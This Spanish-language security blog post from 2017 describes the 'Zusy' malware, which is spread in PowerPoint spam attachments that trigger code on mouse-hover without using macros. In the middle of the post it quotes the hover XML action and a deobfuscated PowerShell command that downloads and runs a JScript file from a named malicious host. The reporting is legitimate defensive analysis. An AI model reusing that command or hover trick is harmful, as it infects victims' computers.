jueves, 8 de junio de 2017



A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.

 


La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios. 

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere": 

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



<a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>

En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:


ppaction://protocol 

Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a http://cccn.nl/c.php y descargar otro archivo. 



Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE
powershell -NoP -NonI -W Hidden -Exec Bypass
 "IEX (New-Object System.Net.WebClient).
DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");
 Invoke-Item \"$env:temp\ii.jse\""
  Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:
Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
http://computerhoy.com/noticias/software/detectado-nuevo-malware-que-infecta-tu-ordenador-powerpoint-63234
https://www.redeszone.net/2017/06/07/ocultar-malware-powerpoint-sin-macros/
Via: blog.elhacker.net